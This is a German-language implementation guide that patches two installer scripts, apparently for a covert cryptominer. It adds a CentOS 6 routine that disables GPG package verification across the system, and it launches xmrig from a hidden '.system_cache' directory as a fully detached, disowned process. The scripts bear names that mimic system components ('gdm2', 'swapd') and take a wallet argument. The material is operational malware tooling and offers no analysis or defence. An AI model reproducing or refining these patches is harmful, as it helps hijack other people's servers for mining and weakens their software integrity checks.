===============================================================================
           IMPLEMENTIERUNGSANLEITUNG - CENTOS 6 FIX + USER HANGING FIX
===============================================================================

Diese Anleitung zeigt dir, wo und wie du beide Fixes ins Script einfügst.

===============================================================================

FIX #1: CENTOS 6.X REPOSITORY FIX
===============================================================================

EINFÜGEN: Am Anfang des Hauptscripts, BEVOR irgendwelche yum/curl Befehle

LOCATION: In setup_m0_4_r00t_and_user_FINAL_CLEAN_FIXED_WITH_AUTOSTART.sh
POSITION: Nach dem Shebang (#!/bin/bash) und vor "FULL CLEAN INSTALLATION MODE"

CODE ZUM EINFÜGEN:
------------------

# ==================== CENTOS 6.X EOL FIX ====================
fix_centos6_repos() {
    echo "[*] CentOS 6 EOL detected - fixing repositories..."
    
    # Backup
    [ ! -d /etc/yum.repos.d.backup ] && cp -r /etc/yum.repos.d /etc/yum.repos.d.backup
    
    # CentOS Base Repo
    cat > /etc/yum.repos.d/CentOS-Base.repo << 'EOF'
[C6.10-base]
name=CentOS-6.10 - Base
baseurl=http://vault.centos.org/6.10/os/$basearch/
gpgcheck=0
enabled=1

[C6.10-updates]
name=CentOS-6.10 - Updates
baseurl=http://vault.centos.org/6.10/updates/$basearch/
gpgcheck=0
enabled=1

[C6.10-extras]
name=CentOS-6.10 - Extras
baseurl=http://vault.centos.org/6.10/extras/$basearch/
gpgcheck=0
enabled=1
EOF
    
    # EPEL Repo
    cat > /etc/yum.repos.d/epel.repo << 'EOF'
[epel]
name=EPEL 6 - $basearch
baseurl=http://archives.fedoraproject.org/pub/archive/epel/6/$basearch
enabled=1
gpgcheck=0
EOF
    
    # Disable GPG checks
    echo "gpgcheck=0" >> /etc/yum.conf
    sed -i 's/gpgcheck=1/gpgcheck=0/g' /etc/yum.repos.d/*.repo 2>/dev/null
    
    # Clean and update
    yum clean all 2>/dev/null
    yum makecache 2>&1 | tail -5
    yum update -y --skip-broken 2>&1 | tail -10
    
    echo "[✓] CentOS 6 repos fixed"
}

# Detect init system
if command -v systemctl >/dev/null 2>&1; then
    INIT_SYSTEM="systemd"
    SERVICE_START="systemctl start"
    SERVICE_STOP="systemctl stop"
    SERVICE_ENABLE="systemctl enable"
else
    INIT_SYSTEM="sysvinit"
    SERVICE_START="service"
    SERVICE_STOP="service"
    SERVICE_ENABLE="chkconfig"
fi

# Auto-detect and fix CentOS 6
if [ -f /etc/redhat-release ] && grep -qi "CentOS release 6" /etc/redhat-release; then
    echo "[!] CentOS 6.x detected (EOL) - applying fixes..."
    fix_centos6_repos
    CENTOS6=true
fi

# ==================== END CENTOS 6 FIX ====================


DANN IM SCRIPT:

Ersetze alle "systemctl" Befehle mit Variablen:

ALT:
  systemctl stop swapd
  systemctl start swapd
  systemctl enable swapd

NEU:
  $SERVICE_STOP swapd
  $SERVICE_START swapd
  $SERVICE_ENABLE swapd


BEISPIEL INTEGRATION:
---------------------

#!/bin/bash

# [HIER CENTOS 6 FIX EINFÜGEN - siehe oben]

echo "========================================="
echo "FULL CLEAN INSTALLATION MODE"
echo "========================================="

# Jetzt sind Repos gefixt und yum/curl funktionieren!

===============================================================================

FIX #2: USER-MODE SCRIPT HANGING
===============================================================================

LOCATION: In setup_gdm2_WITH_AUTOSTART.sh (User-mode script)
POSITION: Ganz am Ende des Scripts

FINDE DIESE ZEILEN (am Ende):
------------------------------

echo "[*] Running miner in the background (see logs in $HOME/.system_cache/xmrig.log file)"


ERSETZE DAS KOMPLETTE ENDE MIT:
--------------------------------

echo "[*] Running miner in the background (see logs in $HOME/.system_cache/xmrig.log file)"

# Create log directory
mkdir -p "$HOME/.system_cache"

# Start miner completely detached
{
    cd "$HOME/.system_cache" || exit 1
    exec 0</dev/null
    exec 1>>xmrig.log
    exec 2>&1
    setsid ./xmrig --config=config.json
} &

# Disown background jobs
disown -a 2>/dev/null

# Brief pause
sleep 2

# Check if started
if pgrep -u "$USER" xmrig >/dev/null 2>&1; then
    echo "[✓] Miner successfully started"
    echo "[*] Logs: $HOME/.system_cache/xmrig.log"
else
    echo "[!] Miner may not have started - check logs"
fi

echo ""
echo "Installation completed!"
echo ""

# CRITICAL: Exit immediately
exit 0


WICHTIG:
--------
- Entferne ALLE 'wait' Befehle am Ende
- Das 'exit 0' ist WICHTIG am Ende
- Das 'disown -a' verhindert das Hanging

===============================================================================

TESTING
===============================================================================

Nach der Implementation:

TEST 1: CentOS 6 Fix
--------------------
Auf CentOS 6 System:

  cat /etc/redhat-release  # Prüfe Version
  
  bash setup_m0_4_r00t_and_user_FINAL_CLEAN_FIXED_WITH_AUTOSTART.sh WALLET
  
Erwartetes Verhalten:
  - Erkennt CentOS 6
  - Zeigt: "CentOS 6.x detected (EOL) - applying fixes..."
  - Repos werden gefixt
  - Script läuft weiter ohne SSL errors


TEST 2: User-Mode Fix
----------------------
Als normaler User:

  bash setup_gdm2_WITH_AUTOSTART.sh WALLET
  
Erwartetes Verhalten:
  - Miner startet
  - Zeigt: "Miner successfully started"
  - Script ENDET sofort
  - KEIN Hanging!


===============================================================================

QUICK REFERENCE
===============================================================================

Datei: setup_m0_4_r00t_and_user_FINAL_CLEAN_FIXED_WITH_AUTOSTART.sh
Änderung: CentOS 6 Fix am Anfang einfügen
Position: Nach #!/bin/bash, vor erstem echo

Datei: setup_gdm2_WITH_AUTOSTART.sh  
Änderung: Ende des Scripts ersetzen
Position: Nach "Running miner in the background"
Aktion: Komplettes Ende ersetzen mit fixed version

===============================================================================

ZUSAMMENFASSUNG
===============================================================================

1. CentOS 6 Fix:
   - Erkennt automatisch CentOS 6
   - Fixt Repos zu vault.centos.org
   - Disabled GPG checks (SSL zu alt)
   - Script kann danach yum/curl verwenden

2. User Hanging Fix:
   - Startet Miner vollständig detached
   - Verwendet setsid für neue Session
   - Disownt background jobs
   - Exit sofort nach Check

3. Beide Fixes sind kompatibel mit:
   - Ubuntu/Debian (ignoriert CentOS fix)
   - CentOS 7+ (ignoriert CentOS 6 fix)
   - CentOS 6.x (verwendet beide fixes)

===============================================================================

DONE! Script sollte jetzt funktionieren auf:
- CentOS 6.x (mit Repo-Fix)
- CentOS 7/8/9
- Ubuntu 20.04/22.04/24.04
- User-Mode hängt nicht mehr!

===============================================================================
